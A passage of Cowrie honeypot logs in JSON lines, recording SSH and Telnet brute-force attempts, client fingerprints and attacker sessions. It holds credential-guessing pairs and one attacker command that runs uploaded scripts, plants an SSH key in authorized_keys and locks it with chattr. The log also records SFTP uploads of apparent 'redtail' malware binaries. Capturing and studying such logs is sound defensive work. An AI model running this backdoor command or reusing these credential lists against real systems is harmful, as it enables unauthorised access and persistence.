6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.482808Z","src_ip":"212.227.235.229","session":"bccab9ed76bf"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:34:12.891756Z","src_ip":"212.227.235.229","session":"bccab9ed76bf"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T02:34:13.030986Z","session":"bccab9ed76bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39682,"dst_ip":"1.2.3.4","dst_port":23,"session":"7a2f342147dd","protocol":"telnet","message":"New connection: 212.227.235.229:39682 (1.2.3.4:23) [session: 7a2f342147dd]","sensor":"my-vps","timestamp":"2025-08-28T02:34:46.740729Z"}
{"eventid":"cowrie.session.closed","duration":13.477063179016113,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:35:00.217752Z","src_ip":"212.227.235.229","session":"7a2f342147dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":53293,"dst_ip":"1.2.3.4","dst_port":22,"session":"d52bd7207dac","protocol":"ssh","message":"New connection: 212.227.125.160:53293 (1.2.3.4:22) [session: d52bd7207dac]","sensor":"my-vps","timestamp":"2025-08-28T02:35:13.326491Z"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:35:13.491851Z","src_ip":"212.227.125.160","session":"d52bd7207dac"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":49604,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3c84efbdd64","protocol":"ssh","message":"New connection: 194.233.79.134:49604 (1.2.3.4:22) [session: b3c84efbdd64]","sensor":"my-vps","timestamp":"2025-08-28T02:35:15.080273Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:35:15.139899Z","src_ip":"194.233.79.134","session":"b3c84efbdd64"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:35:15.659412Z","src_ip":"194.233.79.134","session":"b3c84efbdd64"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:35:16.734979Z","src_ip":"194.233.79.134","session":"b3c84efbdd64"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:35:17.939924Z","src_ip":"194.233.79.134","session":"b3c84efbdd64"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:35:22.347199Z","src_ip":"212.227.235.229","session":"bccab9ed76bf"}
{"eventid":"cowrie.session.connect","src_ip":"186.225.142.90","src_port":11334,"dst_ip":"1.2.3.4","dst_port":22,"session":"71956c5f1807","protocol":"ssh","message":"New connection: 186.225.142.90:11334 (1.2.3.4:22) [session: 71956c5f1807]","sensor":"my-vps","timestamp":"2025-08-28T02:35:58.728688Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:35:59.209666Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:35:59.210354Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.login.success","username":"root","password":"0885334311%%","message":"login attempt [root/0885334311%%] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:36:01.149725Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50314,"dst_ip":"1.2.3.4","dst_port":23,"session":"1001899f3e51","protocol":"telnet","message":"New connection: 212.227.235.229:50314 (1.2.3.4:23) [session: 1001899f3e51]","sensor":"my-vps","timestamp":"2025-08-28T02:36:01.425167Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:36:01.867484Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.command.input","input":"hostname","message":"CMD: hostname","sensor":"my-vps","timestamp":"2025-08-28T02:36:01.868372Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","size":13,"shasum":"7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7063dece7cccf374d9fa1ee30ff23300fa42477e064e69be7bb6d01c0cfff682 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:36:02.086465Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:36:02.087793Z","src_ip":"186.225.142.90","session":"71956c5f1807"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":32952,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9bf185c0271","protocol":"ssh","message":"New connection: 212.227.125.160:32952 (1.2.3.4:22) [session: e9bf185c0271]","sensor":"my-vps","timestamp":"2025-08-28T02:36:29.027444Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:36:41.133619Z","src_ip":"212.227.125.160","session":"e9bf185c0271"}
{"eventid":"cowrie.session.closed","duration":41.03056883811951,"message":"Connection lost after 41 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:36:42.455648Z","src_ip":"212.227.235.229","session":"1001899f3e51"}
{"eventid":"cowrie.client.kex","hassh":"19532158b559096b89b1a5f7d17175b2","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","arcfour128","arcfour","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 19532158b559096b89b1a5f7d17175b2","sensor":"my-vps","timestamp":"2025-08-28T02:36:44.423573Z","src_ip":"212.227.125.160","session":"e9bf185c0271"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":41338,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ff042770656","protocol":"ssh","message":"New connection: 194.233.79.134:41338 (1.2.3.4:22) [session: 9ff042770656]","sensor":"my-vps","timestamp":"2025-08-28T02:36:47.249398Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:36:47.370985Z","src_ip":"194.233.79.134","session":"9ff042770656"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:36:47.450454Z","src_ip":"194.233.79.134","session":"9ff042770656"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:49.011930Z","src_ip":"194.233.79.134","session":"9ff042770656"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:36:50.740878Z","src_ip":"194.233.79.134","session":"9ff042770656"}
{"eventid":"cowrie.session.connect","src_ip":"80.94.95.112","src_port":27258,"dst_ip":"1.2.3.4","dst_port":22,"session":"27046e8f0328","protocol":"ssh","message":"New connection: 80.94.95.112:27258 (1.2.3.4:22) [session: 27046e8f0328]","sensor":"my-vps","timestamp":"2025-08-28T02:36:52.232755Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:36:52.233754Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:36:52.263975Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chowder","message":"login attempt [admin/chowder] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:52.466013Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.login.failed","username":"admin","password":"choppers","message":"login attempt [admin/choppers] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:53.498159Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.login.failed","username":"admin","password":"chango","message":"login attempt [admin/chango] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:54.531133Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.login.failed","username":"admin","password":"catalog","message":"login attempt [admin/catalog] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:55.563127Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.login.failed","username":"admin","password":"cannonda","message":"login attempt [admin/cannonda] failed","sensor":"my-vps","timestamp":"2025-08-28T02:36:56.596970Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.session.closed","duration":"5.4","message":"Connection lost after 5.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:36:57.629055Z","src_ip":"80.94.95.112","session":"27046e8f0328"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60944,"dst_ip":"1.2.3.4","dst_port":23,"session":"9c91dfd4c926","protocol":"telnet","message":"New connection: 212.227.235.229:60944 (1.2.3.4:23) [session: 9c91dfd4c926]","sensor":"my-vps","timestamp":"2025-08-28T02:37:02.674175Z"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T02:37:03.458629Z","src_ip":"212.227.235.229","session":"9c91dfd4c926"}
{"eventid":"cowrie.session.closed","duration":4.594088315963745,"message":"Connection lost after 4 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:07.268187Z","src_ip":"212.227.235.229","session":"9c91dfd4c926"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60204,"dst_ip":"1.2.3.4","dst_port":23,"session":"164a678943bd","protocol":"telnet","message":"New connection: 212.227.235.229:60204 (1.2.3.4:23) [session: 164a678943bd]","sensor":"my-vps","timestamp":"2025-08-28T02:37:07.624916Z"}
{"eventid":"cowrie.login.success","username":"root","password":"","message":"login attempt [root/] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:37:08.413536Z","src_ip":"212.227.235.229","session":"164a678943bd"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:37:08.432659Z","src_ip":"212.227.235.229","session":"164a678943bd"}
{"eventid":"cowrie.command.input","input":"echo SCANNER_TEST","message":"CMD: echo SCANNER_TEST","sensor":"my-vps","timestamp":"2025-08-28T02:37:08.984527Z","src_ip":"212.227.235.229","session":"164a678943bd"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","size":492,"shasum":"f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c","duplicate":true,"duration":"1.6","message":"Closing TTY Log: var/lib/cowrie/tty/f4ea93541bd493b5e3d77850dff84e43ee40e251940eac4916bb3bf0cbbbe44c after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:10.000943Z","src_ip":"212.227.235.229","session":"164a678943bd"}
{"eventid":"cowrie.session.closed","duration":2.381338596343994,"message":"Connection lost after 2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:10.006175Z","src_ip":"212.227.235.229","session":"164a678943bd"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123","message":"login attempt [root/admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:37:30.534300Z","src_ip":"212.227.125.160","session":"e9bf185c0271"}
{"eventid":"cowrie.session.closed","duration":"61.8","message":"Connection lost after 61.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:30.805778Z","src_ip":"212.227.125.160","session":"e9bf185c0271"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":47984,"dst_ip":"1.2.3.4","dst_port":22,"session":"81a730cb381f","protocol":"ssh","message":"New connection: 212.227.125.160:47984 (1.2.3.4:22) [session: 81a730cb381f]","sensor":"my-vps","timestamp":"2025-08-28T02:37:30.865526Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:37:30.866380Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:37:30.913125Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.login.success","username":"root","password":"admin@123","message":"login attempt [root/admin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:37:31.056200Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:37:41.937734Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.command.input","input":"chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","message":"CMD: chmod +x clean.sh; sh clean.sh; rm -rf clean.sh; chmod +x setup.sh; sh setup.sh; rm -rf setup.sh; mkdir -p ~/.ssh; chattr -ia ~/.ssh/authorized_keys; echo \"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCqHrvnL6l7rT/mt1AdgdY9tC1GPK216q0q/7neNVqm7AgvfJIM3ZKniGC3S5x6KOEApk+83GM4IKjCPfq007SvT07qh9AscVxegv66I5yuZTEaDAG6cPXxg3/0oXHTOTvxelgbRrMzfU5SEDAEi8+ByKMefE+pDVALgSTBYhol96hu1GthAMtPAFahqxrvaRR4nL4ijxOsmSLREoAb1lxiX7yvoYLT45/1c5dJdrJrQ60uKyieQ6FieWpO2xF6tzfdmHbiVdSmdw0BiCRwe+fuknZYQxIC1owAj2p5bc+nzVTi3mtBEk9rGpgBnJ1hcEUslEf/zevIcX8+6H7kUMRr rsa-key-20230629\" > ~/.ssh/authorized_keys; chattr +ai ~/.ssh/authorized_keys; uname -a; echo -e \"\\x61\\x75\\x74\\x68\\x5F\\x6F\\x6B\\x0A\"","sensor":"my-vps","timestamp":"2025-08-28T02:37:41.938535Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","size":80,"shasum":"4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4a869e4a816476f12d5cd6aab0625c5f6aab97714a486f6b8a5f484cbc8981f6 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:37:41.987382Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.file_upload","filename":"clean.sh","outfile":"var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","shasum":"d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","message":"SFTP Uploaded file \"clean.sh\" to var/lib/cowrie/downloads/d46555af1173d22f07c37ef9c1e0e74fd68db022f2b6fb3ab5388d2c5bc6a98e","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.034761Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm7","outfile":"var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","shasum":"229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","message":"SFTP Uploaded file \"redtail.arm7\" to var/lib/cowrie/downloads/229496b55d0668a40fe3d969ba4e942dc2c2fd7452b3d6f79c6beb0db631dc12","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.037177Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
{"eventid":"cowrie.session.file_upload","filename":"redtail.arm8","outfile":"var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","shasum":"89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","message":"SFTP Uploaded file \"redtail.arm8\" to var/lib/cowrie/downloads/89782d8142297907c9962eebdae29c28df86805a99f38a683ab55c8fa1596dd8","sensor":"my-vps","timestamp":"2025-08-28T02:37:42.039596Z","src_ip":"212.227.125.160","session":"81a730cb381f"}
